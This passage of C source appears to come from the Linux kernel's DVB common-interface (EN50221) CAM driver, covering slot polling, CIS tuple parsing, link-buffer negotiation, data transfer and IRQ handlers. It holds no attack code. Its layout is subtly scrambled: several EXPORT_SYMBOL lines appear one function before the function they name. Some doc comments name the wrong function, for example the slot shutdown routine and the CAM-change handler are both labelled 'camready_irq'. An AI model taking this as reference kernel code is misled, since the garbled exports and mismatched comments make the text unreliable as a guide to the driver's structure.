mutex ioctl_mutex;\n};\n\nstatic void dvb_ca_en50221_thread_wakeup(struct dvb_ca_private *ca);\nstatic int dvb_ca_en50221_read_data(struct dvb_ca_private *ca, int slot, u8 * ebuf, int ecount);\nstatic int dvb_ca_en50221_write_data(struct dvb_ca_private *ca, int slot, u8 * ebuf, int ecount);\n\n\n/**\n * Safely find needle in haystack.\n *\n * @haystack: Buffer to look in.\n * @hlen: Number of bytes in haystack.\n * @needle: Buffer to find.\n * @nlen: Number of bytes in needle.\n * @return Pointer into haystack needle was found at, or NULL if not found.\n */\nstatic char *findstr(char * haystack, int hlen, char * needle, int nlen)\n{\n\tint i;\n\n\tif (hlen < nlen)\n\t\treturn NULL;\n\n\tfor (i = 0; i <= hlen - nlen; i++) {\n\t\tif (!strncmp(haystack + i, needle, nlen))\n\t\t\treturn haystack + i;\n\t}\n\n\treturn NULL;\n}\n\n\n\n/* ******************************************************************************** */\n/* EN50221 physical interface functions */\n\n\n/**\n * dvb_ca_en50221_check_camstatus - Check CAM status.\n */\nstatic int dvb_ca_en50221_check_camstatus(struct dvb_ca_private *ca, int slot)\n{\n\tint slot_status;\n\tint cam_present_now;\n\tint cam_changed;\n\n\t/* IRQ mode */\n\tif (ca->flags & DVB_CA_EN50221_FLAG_IRQ_CAMCHANGE) {\n\t\treturn (atomic_read(&ca->slot_info[slot].camchange_count) != 0);\n\t}\n\n\t/* poll mode */\n\tslot_status = ca->pub->poll_slot_status(ca->pub, slot, ca->open);\n\n\tcam_present_now = (slot_status & DVB_CA_EN50221_POLL_CAM_PRESENT) ? 1 : 0;\n\tcam_changed = (slot_status & DVB_CA_EN50221_POLL_CAM_CHANGED) ? 1 : 0;\n\tif (!cam_changed) {\n\t\tint cam_present_old = (ca->slot_info[slot].slot_state != DVB_CA_SLOTSTATE_NONE);\n\t\tcam_changed = (cam_present_now != cam_present_old);\n\t}\n\n\tif (cam_changed) {\n\t\tif (!cam_present_now) {\n\t\t\tca->slot_info[slot].camchange_type = DVB_CA_EN50221_CAMCHANGE_REMOVED;\n\t\t} else {\n\t\t\tca->slot_info[slot].camchange_type = DVB_CA_EN50221_CAMCHANGE_INSERTED;\n\t\t}\n\t\tatomic_set(&ca->slot_info[slot].camchange_count, 1);\n\t} else {\n\t\tif ((ca->slot_info[slot].slot_state == DVB_CA_SLOTSTATE_WAITREADY) &&\n\t\t (slot_status & DVB_CA_EN50221_POLL_CAM_READY)) {\n\t\t\t// move to validate state if reset is completed\n\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_VALIDATE;\n\t\t}\n\t}\n\n\treturn cam_changed;\n}\n\n\n/**\n * dvb_ca_en50221_wait_if_status - Wait for flags to become set on the STATUS\n *\t register on a CAM interface, checking for errors and timeout.\n *\n * @ca: CA instance.\n * @slot: Slot on interface.\n * @waitfor: Flags to wait for.\n * @timeout_ms: Timeout in milliseconds.\n *\n * @return 0 on success, nonzero on error.\n */\nstatic int dvb_ca_en50221_wait_if_status(struct dvb_ca_private *ca, int slot,\n\t\t\t\t\t u8 waitfor, int timeout_hz)\n{\n\tunsigned long timeout;\n\tunsigned long start;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\t/* loop until timeout elapsed */\n\tstart = jiffies;\n\ttimeout = jiffies + timeout_hz;\n\twhile (1) {\n\t\t/* read the status and check for error */\n\t\tint res = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_STATUS);\n\t\tif (res < 0)\n\t\t\treturn -EIO;\n\n\t\t/* if we got the flags, it was successful! */\n\t\tif (res & waitfor) {\n\t\t\tdprintk(\"%s succeeded timeout:%lu\\n\", __func__, jiffies - start);\n\t\t\treturn 0;\n\t\t}\n\n\t\t/* check for timeout */\n\t\tif (time_after(jiffies, timeout)) {\n\t\t\tbreak;\n\t\t}\n\n\t\t/* wait for a bit */\n\t\tmsleep(1);\n\t}\n\n\tdprintk(\"%s failed timeout:%lu\\n\", __func__, jiffies - start);\n\n\t/* if we get here, we've timed out */\n\treturn -ETIMEDOUT;\n}\n\n\n/**\n * dvb_ca_en50221_link_init - Initialise the link layer connection to a CAM.\n *\n * @ca: CA instance.\n * @slot: Slot id.\n *\n * @return 0 on success, nonzero on failure.\n */\nstatic int dvb_ca_en50221_link_init(struct dvb_ca_private *ca, int slot)\n{\n\tint ret;\n\tint buf_size;\n\tu8 buf[2];\n\n\tdprintk(\"%s\\n\", __func__);\n\n\t/* we'll be determining these during this function */\n\tca->slot_info[slot].da_irq_supported = 0;\n\n\t/* set the host link buffer size temporarily. it will be overwritten with the\n\t * real negotiated size later. */\n\tca->slot_info[slot].link_buf_size = 2;\n\n\t/* read the buffer size from the CAM */\n\tif ((ret = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_COMMAND, IRQEN | CMDREG_SR)) != 0)\n\t\treturn ret;\n\tif ((ret = dvb_ca_en50221_wait_if_status(ca, slot, STATUSREG_DA, HZ / 10)) != 0)\n\t\treturn ret;\n\tif ((ret = dvb_ca_en50221_read_data(ca, slot, buf, 2)) != 2)\n\t\treturn -EIO;\n\tif ((ret = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_COMMAND, IRQEN)) != 0)\n\t\treturn ret;\n\n\t/* store it, and choose the minimum of our buffer and the CAM's buffer size */\n\tbuf_size = (buf[0] << 8) | buf[1];\n\tif (buf_size > HOST_LINK_BUF_SIZE)\n\t\tbuf_size = HOST_LINK_BUF_SIZE;\n\tca->slot_info[slot].link_buf_size = buf_size;\n\tbuf[0] = buf_size >> 8;\n\tbuf[1] = buf_size & 0xff;\n\tdprintk(\"Chosen link buffer size of %i\\n\", buf_size);\n\n\t/* write the buffer size to the CAM */\n\tif ((ret = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_COMMAND, IRQEN | CMDREG_SW)) != 0)\n\t\treturn ret;\n\tif ((ret = dvb_ca_en50221_wait_if_status(ca, slot, STATUSREG_FR, HZ / 10)) != 0)\n\t\treturn ret;\n\tif ((ret = dvb_ca_en50221_write_data(ca, slot, buf, 2)) != 2)\n\t\treturn -EIO;\n\tif ((ret = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_COMMAND, IRQEN)) != 0)\n\t\treturn ret;\n\n\t/* success */\n\treturn 0;\n}\n\n/**\n * dvb_ca_en50221_read_tuple - Read a tuple from attribute memory.\n *\n * @ca: CA instance.\n * @slot: Slot id.\n * @address: Address to read from. Updated.\n * @tupleType: Tuple id byte. Updated.\n * @tupleLength: Tuple length. Updated.\n * @tuple: Dest buffer for tuple (must be 256 bytes). Updated.\n *\n * @return 0 on success, nonzero on error.\n */\nstatic int dvb_ca_en50221_read_tuple(struct dvb_ca_private *ca, int slot,\n\t\t\t\t int *address, int *tupleType, int *tupleLength, u8 * tuple)\n{\n\tint i;\n\tint _tupleType;\n\tint _tupleLength;\n\tint _address = *address;\n\n\t/* grab the next tuple length and type */\n\tif ((_tupleType = ca->pub->read_attribute_mem(ca->pub, slot, _address)) < 0)\n\t\treturn _tupleType;\n\tif (_tupleType == 0xff) {\n\t\tdprintk(\"END OF CHAIN TUPLE type:0x%x\\n\", _tupleType);\n\t\t*address += 2;\n\t\t*tupleType = _tupleType;\n\t\t*tupleLength = 0;\n\t\treturn 0;\n\t}\n\tif ((_tupleLength = ca->pub->read_attribute_mem(ca->pub, slot, _address + 2)) < 0)\n\t\treturn _tupleLength;\n\t_address += 4;\n\n\tdprintk(\"TUPLE type:0x%x length:%i\\n\", _tupleType, _tupleLength);\n\n\t/* read in the whole tuple */\n\tfor (i = 0; i < _tupleLength; i++) {\n\t\ttuple[i] = ca->pub->read_attribute_mem(ca->pub, slot, _address + (i * 2));\n\t\tdprintk(\" 0x%02x: 0x%02x %c\\n\",\n\t\t\ti, tuple[i] & 0xff,\n\t\t\t((tuple[i] > 31) && (tuple[i] < 127)) ? tuple[i] : '.');\n\t}\n\t_address += (_tupleLength * 2);\n\n\t// success\n\t*tupleType = _tupleType;\n\t*tupleLength = _tupleLength;\n\t*address = _address;\n\treturn 0;\n}\n\n\n/**\n * dvb_ca_en50221_parse_attributes - Parse attribute memory of a CAM module,\n *\textracting Config register, and checking it is a DVB CAM module.\n *\n * @ca: CA instance.\n * @slot: Slot id.\n *\n * @return 0 on success, <0 on failure.\n */\nstatic int dvb_ca_en50221_parse_attributes(struct dvb_ca_private *ca, int slot)\n{\n\tint address = 0;\n\tint tupleLength;\n\tint tupleType;\n\tu8 tuple[257];\n\tchar *dvb_str;\n\tint rasz;\n\tint status;\n\tint got_cftableentry = 0;\n\tint end_chain = 0;\n\tint i;\n\tu16 manfid = 0;\n\tu16 devid = 0;\n\n\n\t// CISTPL_DEVICE_0A\n\tif ((status =\n\t dvb_ca_en50221_read_tuple(ca, slot, &address, &tupleType, &tupleLength, tuple)) < 0)\n\t\treturn status;\n\tif (tupleType != 0x1D)\n\t\treturn -EINVAL;\n\n\n\n\t// CISTPL_DEVICE_0C\n\tif ((status =\n\t dvb_ca_en50221_read_tuple(ca, slot, &address, &tupleType, &tupleLength, tuple)) < 0)\n\t\treturn status;\n\tif (tupleType != 0x1C)\n\t\treturn -EINVAL;\n\n\n\n\t// CISTPL_VERS_1\n\tif ((status =\n\t dvb_ca_en50221_read_tuple(ca, slot, &address, &tupleType, &tupleLength, tuple)) < 0)\n\t\treturn status;\n\tif (tupleType != 0x15)\n\t\treturn -EINVAL;\n\n\n\n\t// CISTPL_MANFID\n\tif ((status = dvb_ca_en50221_read_tuple(ca, slot, &address, &tupleType,\n\t\t\t\t\t\t&tupleLength, tuple)) < 0)\n\t\treturn status;\n\tif (tupleType != 0x20)\n\t\treturn -EINVAL;\n\tif (tupleLength != 4)\n\t\treturn -EINVAL;\n\tmanfid = (tuple[1] << 8) | tuple[0];\n\tdevid = (tuple[3] << 8) | tuple[2];\n\n\n\n\t// CISTPL_CONFIG\n\tif ((status = dvb_ca_en50221_read_tuple(ca, slot, &address, &tupleType,\n\t\t\t\t\t\t&tupleLength, tuple)) < 0)\n\t\treturn status;\n\tif (tupleType != 0x1A)\n\t\treturn -EINVAL;\n\tif (tupleLength < 3)\n\t\treturn -EINVAL;\n\n\t/* extract the configbase */\n\trasz = tuple[0] & 3;\n\tif (tupleLength < (3 + rasz + 14))\n\t\treturn -EINVAL;\n\tca->slot_info[slot].config_base = 0;\n\tfor (i = 0; i < rasz + 1; i++) {\n\t\tca->slot_info[slot].config_base |= (tuple[2 + i] << (8 * i));\n\t}\n\n\t/* check it contains the correct DVB string */\n\tdvb_str = findstr((char *)tuple, tupleLength, \"DVB_CI_V\", 8);\n\tif (dvb_str == NULL)\n\t\treturn -EINVAL;\n\tif (tupleLength < ((dvb_str - (char *) tuple) + 12))\n\t\treturn -EINVAL;\n\n\t/* is it a version we support? */\n\tif (strncmp(dvb_str + 8, \"1.00\", 4)) {\n\t\tprintk(\"dvb_ca adapter %d: Unsupported DVB CAM module version %c%c%c%c\\n\",\n\t\t ca->dvbdev->adapter->num, dvb_str[8], dvb_str[9], dvb_str[10], dvb_str[11]);\n\t\treturn -EINVAL;\n\t}\n\n\t/* process the CFTABLE_ENTRY tuples, and any after those */\n\twhile ((!end_chain) && (address < 0x1000)) {\n\t\tif ((status = dvb_ca_en50221_read_tuple(ca, slot, &address, &tupleType,\n\t\t\t\t\t\t\t&tupleLength, tuple)) < 0)\n\t\t\treturn status;\n\t\tswitch (tupleType) {\n\t\tcase 0x1B:\t// CISTPL_CFTABLE_ENTRY\n\t\t\tif (tupleLength < (2 + 11 + 17))\n\t\t\t\tbreak;\n\n\t\t\t/* if we've already parsed one, just use it */\n\t\t\tif (got_cftableentry)\n\t\t\t\tbreak;\n\n\t\t\t/* get the config option */\n\t\t\tca->slot_info[slot].config_option = tuple[0] & 0x3f;\n\n\t\t\t/* OK, check it contains the correct strings */\n\t\t\tif ((findstr((char *)tuple, tupleLength, \"DVB_HOST\", 8) == NULL) ||\n\t\t\t (findstr((char *)tuple, tupleLength, \"DVB_CI_MODULE\", 13) == NULL))\n\t\t\t\tbreak;\n\n\t\t\tgot_cftableentry = 1;\n\t\t\tbreak;\n\n\t\tcase 0x14:\t// CISTPL_NO_LINK\n\t\t\tbreak;\n\n\t\tcase 0xFF:\t// CISTPL_END\n\t\t\tend_chain = 1;\n\t\t\tbreak;\n\n\t\tdefault:\t/* Unknown tuple type - just skip this tuple and move to the next one */\n\t\t\tdprintk(\"dvb_ca: Skipping unknown tuple type:0x%x length:0x%x\\n\", tupleType,\n\t\t\t\ttupleLength);\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tif ((address > 0x1000) || (!got_cftableentry))\n\t\treturn -EINVAL;\n\n\tdprintk(\"Valid DVB CAM detected MANID:%x DEVID:%x CONFIGBASE:0x%x CONFIGOPTION:0x%x\\n\",\n\t\tmanfid, devid, ca->slot_info[slot].config_base, ca->slot_info[slot].config_option);\n\n\t// success!\n\treturn 0;\n}\n\n\n/**\n * dvb_ca_en50221_set_configoption - Set CAM's configoption correctly.\n *\n * @ca: CA instance.\n * @slot: Slot containing the CAM.\n */\nstatic int dvb_ca_en50221_set_configoption(struct dvb_ca_private *ca, int slot)\n{\n\tint configoption;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\t/* set the config option */\n\tca->pub->write_attribute_mem(ca->pub, slot,\n\t\t\t\t ca->slot_info[slot].config_base,\n\t\t\t\t ca->slot_info[slot].config_option);\n\n\t/* check it */\n\tconfigoption = ca->pub->read_attribute_mem(ca->pub, slot, ca->slot_info[slot].config_base);\n\tdprintk(\"Set configoption 0x%x, read configoption 0x%x\\n\",\n\t\tca->slot_info[slot].config_option, configoption & 0x3f);\n\n\t/* fine! */\n\treturn 0;\n\n}\n\n\n/**\n * dvb_ca_en50221_read_data - This function talks to an EN50221 CAM control\n *\tinterface. It reads a buffer of data from the CAM. The data can either\n *\tbe stored in a supplied buffer, or automatically be added to the slot's\n *\trx_buffer.\n *\n * @ca: CA instance.\n * @slot: Slot to read from.\n * @ebuf: If non-NULL, the data will be written to this buffer. If NULL,\n * the data will be added into the buffering system as a normal fragment.\n * @ecount: Size of ebuf. Ignored if ebuf is NULL.\n *\n * @return Number of bytes read, or < 0 on error\n */\nstatic int dvb_ca_en50221_read_data(struct dvb_ca_private *ca, int slot, u8 * ebuf, int ecount)\n{\n\tint bytes_read;\n\tint status;\n\tu8 buf[HOST_LINK_BUF_SIZE];\n\tint i;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\t/* check if we have space for a link buf in the rx_buffer */\n\tif (ebuf == NULL) {\n\t\tint buf_free;\n\n\t\tif (ca->slot_info[slot].rx_buffer.data == NULL) {\n\t\t\tstatus = -EIO;\n\t\t\tgoto exit;\n\t\t}\n\t\tbuf_free = dvb_ringbuffer_free(&ca->slot_info[slot].rx_buffer);\n\n\t\tif (buf_free < (ca->slot_info[slot].link_buf_size + DVB_RINGBUFFER_PKTHDRSIZE)) {\n\t\t\tstatus = -EAGAIN;\n\t\t\tgoto exit;\n\t\t}\n\t}\n\n\t/* check if there is data available */\n\tif ((status = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_STATUS)) < 0)\n\t\tgoto exit;\n\tif (!(status & STATUSREG_DA)) {\n\t\t/* no data */\n\t\tstatus = 0;\n\t\tgoto exit;\n\t}\n\n\t/* read the amount of data */\n\tif ((status = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_SIZE_HIGH)) < 0)\n\t\tgoto exit;\n\tbytes_read = status << 8;\n\tif ((status = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_SIZE_LOW)) < 0)\n\t\tgoto exit;\n\tbytes_read |= status;\n\n\t/* check it will fit */\n\tif (ebuf == NULL) {\n\t\tif (bytes_read > ca->slot_info[slot].link_buf_size) {\n\t\t\tprintk(\"dvb_ca adapter %d: CAM tried to send a buffer larger than the link buffer size (%i > %i)!\\n\",\n\t\t\t ca->dvbdev->adapter->num, bytes_read, ca->slot_info[slot].link_buf_size);\n\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_LINKINIT;\n\t\t\tstatus = -EIO;\n\t\t\tgoto exit;\n\t\t}\n\t\tif (bytes_read < 2) {\n\t\t\tprintk(\"dvb_ca adapter %d: CAM sent a buffer that was less than 2 bytes!\\n\",\n\t\t\t ca->dvbdev->adapter->num);\n\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_LINKINIT;\n\t\t\tstatus = -EIO;\n\t\t\tgoto exit;\n\t\t}\n\t} else {\n\t\tif (bytes_read > ecount) {\n\t\t\tprintk(\"dvb_ca adapter %d: CAM tried to send a buffer larger than the ecount size!\\n\",\n\t\t\t ca->dvbdev->adapter->num);\n\t\t\tstatus = -EIO;\n\t\t\tgoto exit;\n\t\t}\n\t}\n\n\t/* fill the buffer */\n\tfor (i = 0; i < bytes_read; i++) {\n\t\t/* read byte and check */\n\t\tif ((status = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_DATA)) < 0)\n\t\t\tgoto exit;\n\n\t\t/* OK, store it in the buffer */\n\t\tbuf[i] = status;\n\t}\n\n\t/* check for read error (RE should now be 0) */\n\tif ((status = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_STATUS)) < 0)\n\t\tgoto exit;\n\tif (status & STATUSREG_RE) {\n\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_LINKINIT;\n\t\tstatus = -EIO;\n\t\tgoto exit;\n\t}\n\n\t/* OK, add it to the receive buffer, or copy into external buffer if supplied */\n\tif (ebuf == NULL) {\n\t\tif (ca->slot_info[slot].rx_buffer.data == NULL) {\n\t\t\tstatus = -EIO;\n\t\t\tgoto exit;\n\t\t}\n\t\tdvb_ringbuffer_pkt_write(&ca->slot_info[slot].rx_buffer, buf, bytes_read);\n\t} else {\n\t\tmemcpy(ebuf, buf, bytes_read);\n\t}\n\n\tdprintk(\"Received CA packet for slot %i connection id 0x%x last_frag:%i size:0x%x\\n\", slot,\n\t\tbuf[0], (buf[1] & 0x80) == 0, bytes_read);\n\n\t/* wake up readers when a last_fragment is received */\n\tif ((buf[1] & 0x80) == 0x00) {\n\t\twake_up_interruptible(&ca->wait_queue);\n\t}\n\tstatus = bytes_read;\n\nexit:\n\treturn status;\n}\n\n\n/**\n * dvb_ca_en50221_write_data - This function talks to an EN50221 CAM control\n *\t\t\t\tinterface. It writes a buffer of data to a CAM.\n *\n * @ca: CA instance.\n * @slot: Slot to write to.\n * @ebuf: The data in this buffer is treated as a complete link-level packet to\n * be written.\n * @count: Size of ebuf.\n *\n * @return Number of bytes written, or < 0 on error.\n */\nstatic int dvb_ca_en50221_write_data(struct dvb_ca_private *ca, int slot, u8 * buf, int bytes_write)\n{\n\tint status;\n\tint i;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\n\t/* sanity check */\n\tif (bytes_write > ca->slot_info[slot].link_buf_size)\n\t\treturn -EINVAL;\n\n\t/* it is possible we are dealing with a single buffer implementation,\n\t thus if there is data available for read or if there is even a read\n\t already in progress, we do nothing but awake the kernel thread to\n\t process the data if necessary. */\n\tif ((status = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_STATUS)) < 0)\n\t\tgoto exitnowrite;\n\tif (status & (STATUSREG_DA | STATUSREG_RE)) {\n\t\tif (status & STATUSREG_DA)\n\t\t\tdvb_ca_en50221_thread_wakeup(ca);\n\n\t\tstatus = -EAGAIN;\n\t\tgoto exitnowrite;\n\t}\n\n\t/* OK, set HC bit */\n\tif ((status = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_COMMAND,\n\t\t\t\t\t\t IRQEN | CMDREG_HC)) != 0)\n\t\tgoto exit;\n\n\t/* check if interface is still free */\n\tif ((status = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_STATUS)) < 0)\n\t\tgoto exit;\n\tif (!(status & STATUSREG_FR)) {\n\t\t/* it wasn't free => try again later */\n\t\tstatus = -EAGAIN;\n\t\tgoto exit;\n\t}\n\n\t/*\n\t * It may need some time for the CAM to settle down, or there might\n\t * be a race condition between the CAM, writing HC and our last\n\t * check for DA. This happens, if the CAM asserts DA, just after\n\t * checking DA before we are setting HC. In this case it might be\n\t * a bug in the CAM to keep the FR bit, the lower layer/HW\n\t * communication requires a longer timeout or the CAM needs more\n\t * time internally. But this happens in reality!\n\t * We need to read the status from the HW again and do the same\n\t * we did for the previous check for DA\n\t */\n\tstatus = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_STATUS);\n\tif (status < 0)\n\t\tgoto exit;\n\n\tif (status & (STATUSREG_DA | STATUSREG_RE)) {\n\t\tif (status & STATUSREG_DA)\n\t\t\tdvb_ca_en50221_thread_wakeup(ca);\n\n\t\tstatus = -EAGAIN;\n\t\tgoto exit;\n\t}\n\n\t/* send the amount of data */\n\tif ((status = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_SIZE_HIGH, bytes_write >> 8)) != 0)\n\t\tgoto exit;\n\tif ((status = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_SIZE_LOW,\n\t\t\t\t\t\t bytes_write & 0xff)) != 0)\n\t\tgoto exit;\n\n\t/* send the buffer */\n\tfor (i = 0; i < bytes_write; i++) {\n\t\tif ((status = ca->pub->write_cam_control(ca->pub, slot, CTRLIF_DATA, buf[i])) != 0)\n\t\t\tgoto exit;\n\t}\n\n\t/* check for write error (WE should now be 0) */\n\tif ((status = ca->pub->read_cam_control(ca->pub, slot, CTRLIF_STATUS)) < 0)\n\t\tgoto exit;\n\tif (status & STATUSREG_WE) {\n\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_LINKINIT;\n\t\tstatus = -EIO;\n\t\tgoto exit;\n\t}\n\tstatus = bytes_write;\n\n\tdprintk(\"Wrote CA packet for slot %i, connection id 0x%x last_frag:%i size:0x%x\\n\", slot,\n\t\tbuf[0], (buf[1] & 0x80) == 0, bytes_write);\n\nexit:\n\tca->pub->write_cam_control(ca->pub, slot, CTRLIF_COMMAND, IRQEN);\n\nexitnowrite:\n\treturn status;\n}\nEXPORT_SYMBOL(dvb_ca_en50221_camchange_irq);\n\n\n\n/* ******************************************************************************** */\n/* EN50221 higher level functions */\n\n\n/**\n * dvb_ca_en50221_camready_irq - A CAM has been removed => shut it down.\n *\n * @ca: CA instance.\n * @slot: Slot to shut down.\n */\nstatic int dvb_ca_en50221_slot_shutdown(struct dvb_ca_private *ca, int slot)\n{\n\tdprintk(\"%s\\n\", __func__);\n\n\tca->pub->slot_shutdown(ca->pub, slot);\n\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_NONE;\n\n\t/* need to wake up all processes to check if they're now\n\t trying to write to a defunct CAM */\n\twake_up_interruptible(&ca->wait_queue);\n\n\tdprintk(\"Slot %i shutdown\\n\", slot);\n\n\t/* success */\n\treturn 0;\n}\nEXPORT_SYMBOL(dvb_ca_en50221_camready_irq);\n\n\n/**\n * dvb_ca_en50221_camready_irq - A CAMCHANGE IRQ has occurred.\n *\n * @ca: CA instance.\n * @slot: Slot concerned.\n * @change_type: One of the DVB_CA_CAMCHANGE_* values.\n */\nvoid dvb_ca_en50221_camchange_irq(struct dvb_ca_en50221 *pubca, int slot, int change_type)\n{\n\tstruct dvb_ca_private *ca = pubca->private;\n\n\tdprintk(\"CAMCHANGE IRQ slot:%i change_type:%i\\n\", slot, change_type);\n\n\tswitch (change_type) {\n\tcase DVB_CA_EN50221_CAMCHANGE_REMOVED:\n\tcase DVB_CA_EN50221_CAMCHANGE_INSERTED:\n\t\tbreak;\n\n\tdefault:\n\t\treturn;\n\t}\n\n\tca->slot_info[slot].camchange_type = change_type;\n\tatomic_inc(&ca->slot_info[slot].camchange_count);\n\tdvb_ca_en50221_thread_wakeup(ca);\n}\nEXPORT_SYMBOL(dvb_ca_en50221_frda_irq);\n\n\n/**\n * dvb_ca_en50221_camready_irq - A CAMREADY IRQ has occurred.\n *\n * @ca: CA instance.\n * @slot: Slot concerned.\n */\nvoid dvb_ca_en50221_camready_irq(struct dvb_ca_en50221 *pubca, int slot)\n{\n\tstruct dvb_ca_private *ca = pubca->private;\n\n\tdprintk(\"CAMREADY IRQ slot:%i\\n\", slot);\n\n\tif (ca->slot_info[slot].slot_state == DVB_CA_SLOTSTATE_WAITREADY) {\n\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_VALIDATE;\n\t\tdvb_ca_en50221_thread_wakeup(ca);\n\t}\n}\n\n\n/**\n * An FR or DA IRQ has occurred.\n *\n * @ca: CA instance.\n * @slot: Slot concerned.\n */\nvoid dvb_ca_en50221_frda_irq(struct dvb_ca_en50221 *pubca, int slot)\n{\n\tstruct dvb_ca_private *ca = pubca->private;\n\tint flags;\n\n\tdprintk(\"FR/DA IRQ slot:%i\\n\", slot);\n\n\tswitch (ca->slot_info[slot].slot_state) {\n\tcase DVB_CA_SLOTSTATE_LINKINIT:\n\t\tflags = ca->pub->read_cam_control(pubca, slot, CTRLIF_STATUS);\n\t\tif (flags & STATUSREG_DA) {\n\t\t\tdprintk(\"CAM supports DA IRQ\\n\");\n\t\t\tca->slot_info[slot].da_irq_supported = 1;\n\t\t}\n\t\tbreak;\n\n\tcase DVB_CA_SLOTSTATE_RUNNING:\n\t\tif (ca->open)\n\t\t\tdvb_ca_en50221_thread_wakeup(ca);\n\t\tbreak;\n\t}\n}\n\n\n\n/* ******************************************************************************** */\n/* EN50221 thread functions */\n\n/**\n * Wake up the DVB CA thread\n *\n * @ca: CA instance.\n */\nstatic void dvb_ca_en50221_thread_wakeup(struct dvb_ca_private *ca)\n{\n\n\tdprintk(\"%s\\n\", __func__);\n\n\tca->wakeup = 1;\n\tmb();\n\twake_up_process(ca->thread);\n}\n\n/**\n * Update the delay used by the thread.\n *\n * @ca: CA instance.\n */\nstatic void dvb_ca_en50221_thread_update_delay(struct dvb_ca_private *ca)\n{\n\tint delay;\n\tint curdelay = 100000000;\n\tint slot;\n\n\t/* Beware of too high polling frequency, because one polling\n\t * call might take several hundred milliseconds until timeout!\n\t */\n\tfor (slot = 0; slot < ca->slot_count; slot++) {\n\t\tswitch (ca->slot_info[slot].slot_state) {\n\t\tdefault:\n\t\tcase DVB_CA_SLOTSTATE_NONE:\n\t\t\tdelay = HZ * 60; /* 60s */\n\t\t\tif (!(ca->flags & DVB_CA_EN50221_FLAG_IRQ_CAMCHANGE))\n\t\t\t\tdelay = HZ * 5; /* 5s */\n\t\t\tbreak;\n\t\tcase DVB_CA_SLOTSTATE_INVALID:\n\t\t\tdelay = HZ * 60; /* 60s */\n\t\t\tif (!(ca->flags & DVB_CA_EN50221_FLAG_IRQ_CAMCHANGE))\n\t\t\t\tdelay = HZ / 10; /* 100ms */\n\t\t\tbreak;\n\n\t\tcase DVB_CA_SLOTSTATE_UNINITIALISED:\n\t\tcase DVB_CA_SLOTSTATE_WAITREADY:\n\t\tcase DVB_CA_SLOTSTATE_VALIDATE:\n\t\tcase DVB_CA_SLOTSTATE_WAITFR:\n\t\tcase DVB_CA_SLOTSTATE_LINKINIT:\n\t\t\tdelay = HZ / 10; /* 100ms */\n\t\t\tbreak;\n\n\t\tcase DVB_CA_SLOTSTATE_RUNNING:\n\t\t\tdelay = HZ * 60; /* 60s */\n\t\t\tif (!(ca->flags & DVB_CA_EN50221_FLAG_IRQ_CAMCHANGE))\n\t\t\t\tdelay = HZ / 10; /* 100ms */\n\t\t\tif (ca->open) {\n\t\t\t\tif ((!ca->slot_info[slot].da_irq_supported) ||\n\t\t\t\t (!(ca->flags & DVB_CA_EN50221_FLAG_IRQ_DA)))\n\t\t\t\t\tdelay = HZ / 10; /* 100ms */\n\t\t\t}\n\t\t\tbreak;\n\t\t}\n\n\t\tif (delay < curdelay)\n\t\t\tcurdelay = delay;\n\t}\n\n\tca->delay = curdelay;\n}\n\n\n\n/**\n * Kernel thread which monitors CA slots for CAM changes, and performs data transfers.\n */\nstatic int dvb_ca_en50221_thread(void *data)\n{\n\tstruct dvb_ca_private *ca = data;\n\tint slot;\n\tint flags;\n\tint status;\n\tint pktcount;\n\tvoid *rxbuf;\n\n\tdprintk(\"%s\\n\", __func__);\n\n\t/* choose the correct initial delay */\n\tdvb_ca_en50221_thread_update_delay(ca);\n\n\t/* main loop */\n\twhile (!kthread_should_stop()) {\n\t\t/* sleep for a bit */\n\t\tif (!ca->wakeup) {\n\t\t\tset_current_state(TASK_INTERRUPTIBLE);\n\t\t\tschedule_timeout(ca->delay);\n\t\t\tif (kthread_should_stop())\n\t\t\t\treturn 0;\n\t\t}\n\t\tca->wakeup = 0;\n\n\t\t/* go through all the slots processing them */\n\t\tfor (slot = 0; slot < ca->slot_count; slot++) {\n\n\t\t\tmutex_lock(&ca->slot_info[slot].slot_lock);\n\n\t\t\t// check the cam status + deal with CAMCHANGEs\n\t\t\twhile (dvb_ca_en50221_check_camstatus(ca, slot)) {\n\t\t\t\t/* clear down an old CI slot if necessary */\n\t\t\t\tif (ca->slot_info[slot].slot_state != DVB_CA_SLOTSTATE_NONE)\n\t\t\t\t\tdvb_ca_en50221_slot_shutdown(ca, slot);\n\n\t\t\t\t/* if a CAM is NOW present, initialise it */\n\t\t\t\tif (ca->slot_info[slot].camchange_type == DVB_CA_EN50221_CAMCHANGE_INSERTED) {\n\t\t\t\t\tca->slot_info[slot].slot_state = DVB_CA_SLOTSTATE_UNINITIALISED;\n\t\t\t\t}\n\n\t\t\t\t/* we've handled one CAMCHANGE */\n\t\t\t\tdvb_ca_en50221_thread_update_delay(ca);\n\t\t\t\tatomic_dec(&ca->slot_info[slot].camchange_count);\n\t\t\t}\n\n\t\t\t// CAM state machine\n\t\t\tswitch (ca->slot_info[slot].slot_state) {\n\t\t\tcase DVB_CA_SLOTSTATE_NONE:\n\t\t\tcase DVB_CA_SLOTSTATE_INVALID:\n\t\t\t\t// no action 